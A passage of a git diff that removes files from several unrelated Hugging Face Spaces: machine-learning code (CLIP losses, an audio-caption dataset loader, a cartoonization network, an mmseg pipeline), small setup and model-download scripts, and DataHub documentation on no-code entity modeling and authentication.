self.get_image_features(target_img + 1e-6) - edit_direction = (target_encoding - src_encoding) - - edit_direction /= (edit_direction.clone().norm(dim=-1, keepdim=True)) - - return self.direction_loss(edit_direction, target_directions).sum() - - def global_clip_loss(self, img: torch.Tensor, text) -> torch.Tensor: - if not isinstance(text, list): - text = [text] - - tokens = clip.tokenize(text).to(self.device) - image = self.preprocess(img) - - logits_per_image, _ = self.model(image, tokens) - - return (1. - logits_per_image / 100).mean() - - def random_patch_centers(self, img_shape, num_patches, size): - batch_size, channels, height, width = img_shape - - half_size = size // 2 - patch_centers = np.concatenate( - [np.random.randint(half_size, width - half_size, size=(batch_size * num_patches, 1)), - np.random.randint(half_size, height - half_size, size=(batch_size * num_patches, 1))], axis=1) - - return patch_centers - - def generate_patches(self, img: torch.Tensor, patch_centers, size): - batch_size = img.shape[0] - num_patches = len(patch_centers) // batch_size - half_size = size // 2 - - patches = [] - - for batch_idx in range(batch_size): - for patch_idx in range(num_patches): - center_x = patch_centers[batch_idx * num_patches + patch_idx][0] - center_y = patch_centers[batch_idx * num_patches + patch_idx][1] - - patch = img[batch_idx:batch_idx + 1, :, center_y - half_size:center_y + half_size, - center_x - half_size:center_x + half_size] - - patches.append(patch) - - patches = torch.cat(patches, axis=0) - - return patches - - def patch_scores(self, img: torch.Tensor, class_str: str, patch_centers, patch_size: int) -> torch.Tensor: - - parts = self.compose_text_with_templates(class_str, part_templates) - tokens = clip.tokenize(parts).to(self.device) - text_features = self.encode_text(tokens).detach() - - patches = self.generate_patches(img, patch_centers, patch_size) - image_features = self.get_image_features(patches) - - similarity = image_features @ 
text_features.T - - return similarity - - def clip_patch_similarity(self, src_img: torch.Tensor, source_class: str, target_img: torch.Tensor, - target_class: str) -> torch.Tensor: - patch_size = 196 # TODO remove magic number - - patch_centers = self.random_patch_centers(src_img.shape, 4, patch_size) # TODO remove magic number - - src_scores = self.patch_scores(src_img, source_class, patch_centers, patch_size) - target_scores = self.patch_scores(target_img, target_class, patch_centers, patch_size) - - return self.patch_loss(src_scores, target_scores) - - def patch_directional_loss(self, src_img: torch.Tensor, source_class: str, target_img: torch.Tensor, - target_class: str) -> torch.Tensor: - - if self.patch_text_directions is None: - src_part_classes = self.compose_text_with_templates(source_class, part_templates) - target_part_classes = self.compose_text_with_templates(target_class, part_templates) - - parts_classes = list(zip(src_part_classes, target_part_classes)) - - self.patch_text_directions = torch.cat( - [self.compute_text_direction(pair[0], pair[1]) for pair in parts_classes], dim=0) - - patch_size = 510 # TODO remove magic numbers - - patch_centers = self.random_patch_centers(src_img.shape, 1, patch_size) - - patches = self.generate_patches(src_img, patch_centers, patch_size) - src_features = self.get_image_features(patches) - - patches = self.generate_patches(target_img, patch_centers, patch_size) - target_features = self.get_image_features(patches) - - edit_direction = (target_features - src_features) - edit_direction /= edit_direction.clone().norm(dim=-1, keepdim=True) - - cosine_dists = 1. 
- self.patch_direction_loss(edit_direction.unsqueeze(1), - self.patch_text_directions.unsqueeze(0)) - - patch_class_scores = cosine_dists * (edit_direction @ self.patch_text_directions.T).softmax(dim=-1) - - return patch_class_scores.mean() - - def cnn_feature_loss(self, src_img: torch.Tensor, target_img: torch.Tensor) -> torch.Tensor: - src_features = self.encode_images_with_cnn(src_img) - target_features = self.encode_images_with_cnn(target_img) - - return self.texture_loss(src_features, target_features) - - def forward(self, src_img: torch.Tensor, source_class: str, target_img: torch.Tensor, target_class: str, - texture_image: torch.Tensor = None): - clip_loss = 0.0 - - if self.lambda_global: - clip_loss += self.lambda_global * self.global_clip_loss(target_img, [f"a {target_class}"]) - - if self.lambda_patch: # Same directional loss, but computed on patches - clip_loss += self.lambda_patch * self.patch_directional_loss(src_img, source_class, target_img, - target_class) - - if self.lambda_direction: # The directional loss used in the paper - clip_loss += self.lambda_direction * self.clip_directional_loss(src_img, source_class, target_img, - target_class) - - if self.lambda_manifold: # Compute angles between text and image directions and apply an L1 loss - clip_loss += self.lambda_manifold * self.clip_angle_loss(src_img, source_class, target_img, target_class) - - if self.lambda_texture and (texture_image is not None): # L2 on features extracted by a CNN - clip_loss += self.lambda_texture * self.cnn_feature_loss(texture_image, target_img) - - return clip_loss - - -class DirectionLoss(torch.nn.Module): - - def __init__(self, loss_type='mse'): - super(DirectionLoss, self).__init__() - - self.loss_type = loss_type - - self.loss_func = { - 'mse': torch.nn.MSELoss, - 'cosine': torch.nn.CosineSimilarity, - 'mae': torch.nn.L1Loss - }[loss_type]() - - def forward(self, x, y): - if self.loss_type == "cosine": - return 1. 
- self.loss_func(x, y) - - return self.loss_func(x, y) - - diff --git a/spaces/YotamNitzan/domain-expansion/spinup.sh b/spaces/YotamNitzan/domain-expansion/spinup.sh deleted file mode 100644 index be1c2e7308395864ff89826a29e3a741294a670c..0000000000000000000000000000000000000000 --- a/spaces/YotamNitzan/domain-expansion/spinup.sh +++ /dev/null @@ -1,6 +0,0 @@ -MY_UID="$(id -u)" MY_GID="$(id -g)" docker-compose build -MY_UID="$(id -u)" MY_GID="$(id -g)" docker-compose run --service-ports alv_domain - - -# python3.8 generate_aligned.py --ckpt "./ffhq100.pkl" --out_dir "./out" --num 2 --truncation_psi -# python generate_aligned.py --ckpt "./afhqdog.pkl" --out_dir "./out" --num 2 --truncation_psi \ No newline at end of file diff --git a/spaces/YuAnthony/Audio-Caption/data_handling/clotho_dataset.py b/spaces/YuAnthony/Audio-Caption/data_handling/clotho_dataset.py deleted file mode 100644 index 880b716ec65d9373fdf095c65d6a65081d7cb0d1..0000000000000000000000000000000000000000 --- a/spaces/YuAnthony/Audio-Caption/data_handling/clotho_dataset.py +++ /dev/null @@ -1,166 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -from typing import Tuple, List, AnyStr, Union -from pathlib import Path - -from numpy import ndarray, recarray -from torch.utils.data import Dataset -from numpy import load as np_load - -import torch -import numpy as np -import os - -__author__ = 'Konstantinos Drossos -- Tampere University' -__docformat__ = 'reStructuredText' -__all__ = ['ClothoDataset'] - - -class ClothoDataset(Dataset): - - def __init__(self, data_dir: Path, - split: AnyStr, - input_field_name: AnyStr, - output_field_name: AnyStr, - load_into_memory: bool) \ - -> None: - """Initialization of a Clotho dataset object. - - :param data_dir: Directory with data. - :type data_dir: pathlib.Path - :param split: Split to use (i.e. 'development', 'evaluation') - :type split: str - :param input_field_name: Field name of the clotho data\ - to be used as input data to the\ - method. 
- :type input_field_name: str - :param output_field_name: Field name of the clotho data\ - to be used as output data to the\ - method. - :type output_field_name: str - :param load_into_memory: Load all data into memory? - :type load_into_memory: bool - """ - super(ClothoDataset, self).__init__() - the_dir: Path = data_dir.joinpath(split) - - self.examples: List[Path] = sorted(the_dir.iterdir()) - self.input_name: str = input_field_name - self.output_name: str = output_field_name - self.load_into_memory: bool = load_into_memory - - if load_into_memory: - self.examples: List[recarray] = [np_load(str(f), allow_pickle=True) - for f in self.examples] - - def __len__(self) \ - -> int: - """Gets the amount of examples in the dataset. - - :return: Amount of examples in the dataset. - :rtype: int - """ - return len(self.examples) - - def __getitem__(self, - item: int) \ - -> Tuple[ndarray, ndarray]: - """Gets an example from the dataset. - - :param item: Index of the item. - :type item: int - :return: Input and output values. - :rtype: numpy.ndarray. numpy.ndarray - """ - ex: Union[Path, recarray] = self.examples[item] - if not self.load_into_memory: - ex: recarray = np_load(str(ex), allow_pickle=True) - - in_e, ou_e = [ex[i].item() for i in [self.input_name, self.output_name]] - - return in_e, ou_e - - -class ClothoDatasetEval(Dataset): - - def __init__(self, data_dir: Path, - split: AnyStr, - input_field_name: AnyStr, - output_field_name: AnyStr, - load_into_memory: bool) \ - -> None: - """Initialization of a Clotho dataset object. - - :param data_dir: Directory with data. - :type data_dir: pathlib.Path - :param split: Split to use (i.e. 'development', 'evaluation') - :type split: str - :param input_field_name: Field name of the clotho data\ - to be used as input data to the\ - method. - :type input_field_name: str - :param output_field_name: Field name of the clotho data\ - to be used as output data to the\ - method. 
- :type output_field_name: str - :param load_into_memory: Load all data into memory? - :type load_into_memory: bool - """ - super(ClothoDatasetEval, self).__init__() - the_dir: Path = data_dir.joinpath(split) - if split == 'evaluation': - self.examples: List[Path] = sorted(the_dir.iterdir())[::5] # changed - else: - self.examples: List[Path] = sorted(the_dir.iterdir()) # changed - # self.examples: List[Path] = sorted(the_dir.iterdir()) - self.input_name: str = input_field_name - self.output_name: str = output_field_name - self.load_into_memory: bool = load_into_memory - self.data_dir = the_dir - - if load_into_memory: - self.examples: List[recarray] = [np_load(str(f), allow_pickle=True) - for f in self.examples] - - def __len__(self) \ - -> int: - """Gets the amount of examples in the dataset. - - :return: Amount of examples in the dataset. - :rtype: int - """ - return len(self.examples) - - def __getitem__(self, - item: int): - """Gets an example from the dataset. - - :param item: Index of the item. - :type item: int - :return: Input and output values. - :rtype: numpy.ndarray, numpy.ndarray - """ - ex: Union[Path, recarray] = self.examples[item] - if not self.load_into_memory: - ex: recarray = np_load(str(ex), allow_pickle=True) - - in_e, ou_e = [ex[i].item() for i in [self.input_name, self.output_name]] - - all_ref = get_all_ref(ex['file_name'].item(), self.data_dir) - - filename = str(ex['file_name'].item()) - out_len = len(ou_e) - return in_e, ou_e, all_ref, filename, out_len - - -def get_all_ref(filename, data_dir): - filename = str(filename) - # tgt = [np.load(d, allow_pickle=True).words_ind.tolist() - tgt = [np.load(d, allow_pickle=True)['words_ind'].item().tolist() - for d in [os.path.join(data_dir, 'clotho_file_{filename}.wav_{i}.npy'. 
- format(filename=filename[:-4], # strip the '.wav' extension - i=i)) for i in range(5)] # wav_0-wav_4 - ] - return tgt -# EOF diff --git a/spaces/Yukki-Yui/White-box-Cartoonization/wbc/network.py b/spaces/Yukki-Yui/White-box-Cartoonization/wbc/network.py deleted file mode 100644 index 6f16cee1aa1994d0a78c524f459764de5164e637..0000000000000000000000000000000000000000 --- a/spaces/Yukki-Yui/White-box-Cartoonization/wbc/network.py +++ /dev/null @@ -1,62 +0,0 @@ -import tensorflow as tf -import numpy as np -import tensorflow.contrib.slim as slim - - - -def resblock(inputs, out_channel=32, name='resblock'): - - with tf.variable_scope(name): - - x = slim.convolution2d(inputs, out_channel, [3, 3], - activation_fn=None, scope='conv1') - x = tf.nn.leaky_relu(x) - x = slim.convolution2d(x, out_channel, [3, 3], - activation_fn=None, scope='conv2') - - return x + inputs - - - - -def unet_generator(inputs, channel=32, num_blocks=4, name='generator', reuse=False): - with tf.variable_scope(name, reuse=reuse): - - x0 = slim.convolution2d(inputs, channel, [7, 7], activation_fn=None) - x0 = tf.nn.leaky_relu(x0) - - x1 = slim.convolution2d(x0, channel, [3, 3], stride=2, activation_fn=None) - x1 = tf.nn.leaky_relu(x1) - x1 = slim.convolution2d(x1, channel*2, [3, 3], activation_fn=None) - x1 = tf.nn.leaky_relu(x1) - - x2 = slim.convolution2d(x1, channel*2, [3, 3], stride=2, activation_fn=None) - x2 = tf.nn.leaky_relu(x2) - x2 = slim.convolution2d(x2, channel*4, [3, 3], activation_fn=None) - x2 = tf.nn.leaky_relu(x2) - - for idx in range(num_blocks): - x2 = resblock(x2, out_channel=channel*4, name='block_{}'.format(idx)) - - x2 = slim.convolution2d(x2, channel*2, [3, 3], activation_fn=None) - x2 = tf.nn.leaky_relu(x2) - - h1, w1 = tf.shape(x2)[1], tf.shape(x2)[2] - x3 = tf.image.resize_bilinear(x2, (h1*2, w1*2)) - x3 = slim.convolution2d(x3+x1, channel*2, [3, 3], activation_fn=None) - x3 = tf.nn.leaky_relu(x3) - x3 = slim.convolution2d(x3, channel, [3, 3], activation_fn=None) - x3 = tf.nn.leaky_relu(x3) 
- - h2, w2 = tf.shape(x3)[1], tf.shape(x3)[2] - x4 = tf.image.resize_bilinear(x3, (h2*2, w2*2)) - x4 = slim.convolution2d(x4+x0, channel, [3, 3], activation_fn=None) - x4 = tf.nn.leaky_relu(x4) - x4 = slim.convolution2d(x4, 3, [7, 7], activation_fn=None) - - return x4 - -if __name__ == '__main__': - - - pass \ No newline at end of file diff --git a/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/model_download/yolov5_model_p5_n.sh b/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/model_download/yolov5_model_p5_n.sh deleted file mode 100644 index 5fc6d093f4b92e1ad735f8b513d01d95f4d53d5c..0000000000000000000000000000000000000000 --- a/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/model_download/yolov5_model_p5_n.sh +++ /dev/null @@ -1,4 +0,0 @@ -cd ./yolov5 - -# Download the YOLOv5 model -wget -c -t 0 https://github.com/ultralytics/yolov5/releases/download/v6.1/yolov5n.pt diff --git a/spaces/abdvl/datahub_qa_bot/docs/advanced/no-code-modeling.md b/spaces/abdvl/datahub_qa_bot/docs/advanced/no-code-modeling.md deleted file mode 100644 index e1fadee6d371a4a6a816a3d0f1562fdda535c0fe..0000000000000000000000000000000000000000 --- a/spaces/abdvl/datahub_qa_bot/docs/advanced/no-code-modeling.md +++ /dev/null @@ -1,403 +0,0 @@ -# No Code Metadata - -## Summary of changes - -As part of the No Code Metadata Modeling initiative, we've made radical changes to the DataHub stack. - -Specifically, we've - -- Decoupled the persistence layer from Java + Rest.li specific concepts -- Consolidated the per-entity Rest.li resources into a single general-purpose Entity Resource -- Consolidated the per-entity Graph Index Writers + Readers into a single general-purpose Neo4J DAO -- Consolidated the per-entity Search Index Writers + Readers into a single general-purpose ES DAO. -- Developed mechanisms for declaring search indexing configurations + foreign key relationships as annotations -on PDL models themselves. 
-- Introduced a special "Browse Paths" aspect that allows the browse configuration to be -pushed into DataHub, as opposed to computed in a blackbox lambda sitting within DataHub -- Introduced special "Key" aspects for conveniently representing the information that identifies a DataHub entity via -a normal struct. -- Removed the need for hand-written Elastic `settings.json` and `mappings.json`. (Now generated at runtime) -- Removed the need for the Elastic Set Up container (indexes are now registered at runtime) -- Simplified the number of models that need to be maintained for each DataHub entity. We removed the need for - 1. Relationship Models - 2. Entity Models - 3. Urn models + the associated Java container classes - 4. 'Value' models, those which are returned by the Rest.li resource - -In doing so, we dramatically reduced the level of effort required to add or extend an existing entity. - -For more on the design considerations, see the **Design** section below. - - -## Engineering Spec - -This section will provide a more in-depth overview of the design considerations that were at play when working on the No -Code initiative. - -# Use Cases - -Who needs what & why? - -| As a | I want to | because -| ---------------- | ------------------------ | ------------------------------ -| DataHub Operator | Add new entities | The default domain model does not match my business needs -| DataHub Operator | Extend existing entities | The default domain model does not match my business needs - -What we heard from folks in the community is that adding new entities + aspects is just **too difficult**. - -They'd be happy if this process was streamlined and simple. **Extra** happy if there was no chance of merge conflicts in the future. (no fork necessary) - -# Goals - -### Primary Goal - -**Reduce the friction** of adding new entities, aspects, and relationships. - -### Secondary Goal - -Achieve the primary goal in a way that does not require a fork. 
- -# Requirements - -### Must-Haves - -1. Mechanisms for **adding** a browsable, searchable, linkable GMS entity by defining one or more PDL models - - GMS Endpoint for fetching entity - - GMS Endpoint for fetching entity relationships - - GMS Endpoint for searching entity - - GMS Endpoint for browsing entity -2. Mechanisms for **extending** a browsable, searchable, linkable GMS entity by defining one or more PDL models - - GMS Endpoint for fetching entity - - GMS Endpoint for fetching entity relationships - - GMS Endpoint for searching entity - - GMS Endpoint for browsing entity -3. Mechanisms + conventions for introducing a new **relationship** between 2 GMS entities without writing code -4. Clear documentation describing how to perform actions in #1, #2, and #3 above published on [datahubproject.io](http://datahubproject.io) - -## Nice-to-haves - -1. Mechanisms for automatically generating a working GraphQL API using the entity PDL models -2. Ability to add / extend GMS entities without a fork. - - e.g. **Register** new entity / extensions *at runtime*. (Unlikely due to code generation) - - or, **configure** new entities at *deploy time* - -## What Success Looks Like - -1. Adding a new browsable, searchable entity to GMS (not DataHub UI / frontend) takes 1 dev < 15 minutes. -2. Extending an existing browsable, searchable entity in GMS takes 1 dev < 15 minutes -3. Adding a new relationship among 2 GMS entities takes 1 dev < 15 minutes -4. [Bonus] Implementing the `datahub-frontend` GraphQL API for a new / extended entity takes < 10 minutes - - -## Design - -## State of the World - -### Modeling - -Currently, there are various models in GMS: - -1. [Urn](https://github.com/datahub-project/datahub/blob/master/li-utils/src/main/pegasus/com/linkedin/common/DatasetUrn.pdl) - Structs composing primary keys -2. 
[Root] [Snapshots](https://github.com/datahub-project/datahub/blob/master/metadata-models/src/main/pegasus/com/linkedin/metadata/snapshot/Snapshot.pdl) - Container of aspects -3. [Aspects](https://github.com/datahub-project/datahub/blob/master/metadata-models/src/main/pegasus/com/linkedin/metadata/aspect/DashboardAspect.pdl) - Optional container of fields -4. [Values](https://github.com/datahub-project/datahub/blob/master/gms/api/src/main/pegasus/com/linkedin/dataset/Dataset.pdl), [Keys](https://github.com/datahub-project/datahub/blob/master/gms/api/src/main/pegasus/com/linkedin/dataset/DatasetKey.pdl) - Model returned by GMS [Rest.li](http://rest.li) API (public facing) -5. [Entities](https://github.com/datahub-project/datahub/blob/master/metadata-models/src/main/pegasus/com/linkedin/metadata/entity/DatasetEntity.pdl) - Records with fields derived from the URN. Used only in graph / relationships -6. [Relationships](https://github.com/datahub-project/datahub/blob/master/metadata-models/src/main/pegasus/com/linkedin/metadata/relationship/Relationship.pdl) - Edges between 2 entities with optional edge properties -7. [Search Documents](https://github.com/datahub-project/datahub/blob/master/metadata-models/src/main/pegasus/com/linkedin/metadata/search/ChartDocument.pdl) - Flat documents for indexing within Elastic index - - And corresponding index [mappings.json](https://github.com/datahub-project/datahub/blob/master/gms/impl/src/main/resources/index/chart/mappings.json), [settings.json](https://github.com/datahub-project/datahub/blob/master/gms/impl/src/main/resources/index/chart/settings.json) - -Various components of GMS depend on / make assumptions about these model types: - -1. IndexBuilders depend on **Documents** -2. GraphBuilders depend on **Snapshots** -3. RelationshipBuilders depend on **Aspects** -4. Mae Processor depend on **Snapshots, Documents, Relationships** -5. Mce Processor depend on **Snapshots, Urns** -6. 
[Rest.li](http://rest.li) Resources on **Documents, Snapshots, Aspects, Values, Urns** -7. Graph Reader Dao (BaseQueryDao) depends on **Relationships, Entity** -8. Graph Writer Dao (BaseGraphWriterDAO) depends on **Relationships, Entity** -9. Local Dao Depends on **aspects, urns** -10. Search Dao depends on **Documents** - -Additionally, there are some implicit concepts that require additional caveats / logic: - -1. Browse Paths - Requires defining logic in an entity-specific index builder to generate. -2. Urns - Requires defining a) an Urn PDL model and b) a hand-written Urn class - -As you can see, there are many tied up concepts. Fundamentally changing the model would require a serious amount of refactoring, as it would require new versions of numerous components. - -The challenge is, how can we meet the requirements without fundamentally altering the model? - -## Proposed Solution - -In a nutshell, the idea is to consolidate the number of models + code we need to write on a per-entity basis. -We intend to achieve this by making search index + relationship configuration declarative, specified as part of the model -definition itself. - -We will use this configuration to drive more generic versions of the index builders + rest resources, -with the intention of reducing the overall surface area of GMS. - -During this initiative, we will also seek to make the concepts of Browse Paths and Urns declarative. Browse Paths -will be provided using a special BrowsePaths aspect. Urns will no longer be strongly typed. - -To achieve this, we will attempt to generify many components throughout the stack. 
Currently, many of them are defined on -a *per-entity* basis, including - -- Rest.li Resources -- Index Builders -- Graph Builders -- Local, Search, Browse, Graph DAOs -- Clients -- Browse Path Logic - -along with simplifying the number of raw data models that need to be defined, including - -- Rest.li Resource Models -- Search Document Models -- Relationship Models -- Urns + their java classes - -From an architectural PoV, we will move from a before that looks something like this: - -![no-code-before](../imgs/no-code-before.png) - -to an after that looks like this - -![no-code-after](../imgs/no-code-after.png) - -That is, a move away from patterns of strong-typing-everywhere to a more generic + flexible world. - -### How will we do it? - -We will accomplish this by building the following: - -1. Set of custom annotations to permit declarative entity, search, graph configurations - - @Entity & @Aspect - - @Searchable - - @Relationship -2. Entity Registry: In-memory structures for representing, storing & serving metadata associated with a particular Entity, including search and relationship configurations. -3. Generic Entity, Search, Graph Service classes: Replaces traditional strongly-typed DAOs with flexible, pluggable APIs that can be used for CRUD, search, and graph across all entities. -4. Generic Rest.li Resources: - - 1 permitting reading, writing, searching, autocompleting, and browsing arbitrary entities - - 1 permitting reading of arbitrary entity-entity relationship edges -5. Generic Search Index Builder: Given a MAE and a specification of the Search Configuration for an entity, updates the search index. -6. Generic Graph Index Builder: Given a MAE and a specification of the Relationship Configuration for an entity, updates the graph index. -7. Generic Index + Mappings Builder: Dynamically generates index mappings and creates indices on the fly. -8. 
Introduction of special aspects to address other imperative code requirements - - BrowsePaths Aspect: Include an aspect to permit customization of the indexed browse paths. - - Key aspects: Include "virtual" aspects for representing the fields that uniquely identify an Entity for easy - reading by clients of DataHub. - -### Final Developer Experience: Defining an Entity - -We will outline what the experience of adding a new Entity should look like. We will imagine we want to define a "Service" entity representing -online microservices. - -#### Step 1. Add aspects - -ServiceKey.pdl - -``` -namespace com.linkedin.metadata.key - -/** - * Key for a Service - */ -@Aspect = { - "name": "serviceKey" -} -record ServiceKey { - /** - * Name of the service - */ - @Searchable = { - "fieldType": "TEXT_PARTIAL", - "enableAutocomplete": true - } - name: string -} -``` - -ServiceInfo.pdl - -``` -namespace com.linkedin.service - -import com.linkedin.common.Urn - -/** - * Properties associated with a Service - */ -@Aspect = { - "name": "serviceInfo" -} -record ServiceInfo { - - /** - * Description of the service - */ - @Searchable = {} - description: string - - /** - * The owners of the service - */ - @Relationship = { - "name": "OwnedBy", - "entityTypes": ["corpUser"] - } - owner: Urn -} -``` - -#### Step 2. Add aspect union. - -ServiceAspect.pdl - -``` -namespace com.linkedin.metadata.aspect - -import com.linkedin.metadata.key.ServiceKey -import com.linkedin.service.ServiceInfo -import com.linkedin.common.BrowsePaths - -/** - * Service Info - */ -typeref ServiceAspect = union[ - ServiceKey, - ServiceInfo, - BrowsePaths -] -``` - -#### Step 3. Add Snapshot model. 
- -ServiceSnapshot.pdl - -``` -namespace com.linkedin.metadata.snapshot - -import com.linkedin.common.Urn -import com.linkedin.metadata.aspect.ServiceAspect - -@Entity = { - "name": "service", - "keyAspect": "serviceKey" -} -record ServiceSnapshot { - - /** - * Urn for the service - */ - urn: Urn - - /** - * The list of service aspects - */ - aspects: array[ServiceAspect] -} -``` - -#### Step 4. Update Snapshot union. - -Snapshot.pdl - -``` -namespace com.linkedin.metadata.snapshot - -/** - * A union of all supported metadata snapshot types. - */ -typeref Snapshot = union[ - ... - ServiceSnapshot -] -``` - -### Interacting with New Entity - -1. Write Entity - -``` -curl 'http://localhost:8080/entities?action=ingest' -X POST -H 'X-RestLi-Protocol-Version:2.0.0' --data '{ - "entity":{ - "value":{ - "com.linkedin.metadata.snapshot.ServiceSnapshot":{ - "urn": "urn:li:service:mydemoservice", - "aspects":[ - { - "com.linkedin.service.ServiceInfo":{ - "description":"My demo service", - "owner": "urn:li:corpuser:user1" - } - }, - { - "com.linkedin.common.BrowsePaths":{ - "paths":[ - "/my/custom/browse/path1", - "/my/custom/browse/path2" - ] - } - } - ] - } - } - } -}' -``` - -2. Read Entity - -``` -curl 'http://localhost:8080/entities/urn%3Ali%3Aservice%3Amydemoservice' -H 'X-RestLi-Protocol-Version:2.0.0' -``` - -3. Search Entity - -``` -curl --location --request POST 'http://localhost:8080/entities?action=search' \ ---header 'X-RestLi-Protocol-Version: 2.0.0' \ ---header 'Content-Type: application/json' \ ---data-raw '{ - "input": "My demo", - "entity": "service", - "start": 0, - "count": 10 -}' -``` - -4. Autocomplete - -``` -curl --location --request POST 'http://localhost:8080/entities?action=autocomplete' \ ---header 'X-RestLi-Protocol-Version: 2.0.0' \ ---header 'Content-Type: application/json' \ ---data-raw '{ - "query": "mydem", - "entity": "service", - "limit": 10 -}' -``` - -5. 
Browse - -``` -curl --location --request POST 'http://localhost:8080/entities?action=browse' \ ---header 'X-RestLi-Protocol-Version: 2.0.0' \ ---header 'Content-Type: application/json' \ ---data-raw '{ - "path": "/my/custom/browse", - "entity": "service", - "start": 0, - "limit": 10 -}' -``` - -6. Relationships - -``` -curl --location --request GET 'http://localhost:8080/relationships?direction=INCOMING&urn=urn%3Ali%3Acorpuser%3Auser1&types=OwnedBy' \ ---header 'X-RestLi-Protocol-Version: 2.0.0' -``` - diff --git a/spaces/abdvl/datahub_qa_bot/docs/authentication/README.md b/spaces/abdvl/datahub_qa_bot/docs/authentication/README.md deleted file mode 100644 index 4034cb15cfd22b5485794f51b71b04a0fff9d5f6..0000000000000000000000000000000000000000 --- a/spaces/abdvl/datahub_qa_bot/docs/authentication/README.md +++ /dev/null @@ -1,55 +0,0 @@ -# Overview - -Authentication is the process of verifying the identity of a user or service. There are two -places where Authentication occurs inside DataHub: - -1. DataHub frontend service when a user attempts to log in to the DataHub application. -2. DataHub backend service when making API requests to DataHub. - -In this document, we'll take a closer look at both. - -### Authentication in the Frontend - -Authentication of normal users of DataHub takes place in two phases. - -At login time, authentication is performed by either DataHub itself (via username / password entry) or a third-party Identity Provider. Once the identity -of the user has been established, and credentials validated, a persistent session token is generated for the user and stored -in a browser-side session cookie. - -DataHub provides 3 mechanisms for authentication at login time: - -- **Native Authentication** which uses username and password combinations natively stored and managed by DataHub, with users invited via an invite link. 
-- [Single Sign-On with OpenID Connect](guides/sso/configure-oidc-react.md) to delegate authentication responsibility to third party systems like Okta or Google/Azure Authentication. This is the recommended approach for production systems. -- [JaaS Authentication](guides/jaas.md) for simple deployments where authenticated users are part of some known list or invited as a [Native DataHub User](guides/add-users.md). - -In subsequent requests, the session token is used to represent the authenticated identity of the user, and is validated by DataHub's backend service (discussed below). -Eventually, the session token expires (after 24 hours by default), at which point the end user is required to log in again. - -### Authentication in the Backend (Metadata Service) - -When a user makes a request for data within DataHub, the request is authenticated by DataHub's Backend (Metadata Service) via a JSON Web Token. This applies to both requests originating from the DataHub application, -and programmatic calls to DataHub APIs. There are two types of tokens that are important: - -1. **Session Tokens**: Generated for users of the DataHub web application. By default, these have a duration of 24 hours. -These tokens are encoded and stored inside browser-side session cookies. -2. **Personal Access Tokens**: These are tokens generated via the DataHub settings panel that are useful for interacting -with DataHub APIs. They can be used to automate processes like enriching documentation, ownership, tags, and more on DataHub. Learn -more about Personal Access Tokens [here](personal-access-tokens.md). - -To learn more about DataHub's backend authentication, check out [Introducing Metadata Service Authentication](introducing-metadata-service-authentication.md). - -Credentials must be provided as Bearer Tokens inside of the **Authorization** header in any request made to DataHub's API layer. 
To learn - -```shell -Authorization: Bearer -``` - -Note that in DataHub local quickstarts, Authentication at the backend layer is disabled for convenience. This leaves the backend -vulnerable to unauthenticated requests and should not be used in production. To enable -backend (token-based) authentication, simply set the `METADATA_SERVICE_AUTH_ENABLED=true` environment variable -for the datahub-gms container or pod. - -### References - -For a quick video on the topic of users and groups within DataHub, have a look at [DataHub Basics — Users, Groups, & Authentication 101 -](https://youtu.be/8Osw6p9vDYY) \ No newline at end of file diff --git a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/datasets/pipelines/formating.py b/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/datasets/pipelines/formating.py deleted file mode 100644 index 97db85f4f9db39fb86ba77ead7d1a8407d810adb..0000000000000000000000000000000000000000 --- a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/datasets/pipelines/formating.py +++ /dev/null @@ -1,288 +0,0 @@ -from collections.abc import Sequence - -import annotator.uniformer.mmcv as mmcv -import numpy as np -import torch -from annotator.uniformer.mmcv.parallel import DataContainer as DC - -from ..builder import PIPELINES - - -def to_tensor(data): - """Convert objects of various python types to :obj:`torch.Tensor`. - - Supported types are: :class:`numpy.ndarray`, :class:`torch.Tensor`, - :class:`Sequence`, :class:`int` and :class:`float`. - - Args: - data (torch.Tensor | numpy.ndarray | Sequence | int | float): Data to - be converted. 
- """ - - if isinstance(data, torch.Tensor): - return data - elif isinstance(data, np.ndarray): - return torch.from_numpy(data) - elif isinstance(data, Sequence) and not mmcv.is_str(data): - return torch.tensor(data) - elif isinstance(data, int): - return torch.LongTensor([data]) - elif isinstance(data, float): - return torch.FloatTensor([data]) - else: - raise TypeError(f'type {type(data)} cannot be converted to tensor.') - - -@PIPELINES.register_module() -class ToTensor(object): - """Convert some results to :obj:`torch.Tensor` by given keys. - - Args: - keys (Sequence[str]): Keys that need to be converted to Tensor. - """ - - def __init__(self, keys): - self.keys = keys - - def __call__(self, results): - """Call function to convert data in results to :obj:`torch.Tensor`. - - Args: - results (dict): Result dict contains the data to convert. - - Returns: - dict: The result dict contains the data converted - to :obj:`torch.Tensor`. - """ - - for key in self.keys: - results[key] = to_tensor(results[key]) - return results - - def __repr__(self): - return self.__class__.__name__ + f'(keys={self.keys})' - - -@PIPELINES.register_module() -class ImageToTensor(object): - """Convert image to :obj:`torch.Tensor` by given keys. - - The dimension order of input image is (H, W, C). The pipeline will convert - it to (C, H, W). If only 2 dimension (H, W) is given, the output would be - (1, H, W). - - Args: - keys (Sequence[str]): Key of images to be converted to Tensor. - """ - - def __init__(self, keys): - self.keys = keys - - def __call__(self, results): - """Call function to convert image in results to :obj:`torch.Tensor` and - transpose the channel order. - - Args: - results (dict): Result dict contains the image data to convert. - - Returns: - dict: The result dict contains the image converted - to :obj:`torch.Tensor` and transposed to (C, H, W) order. 
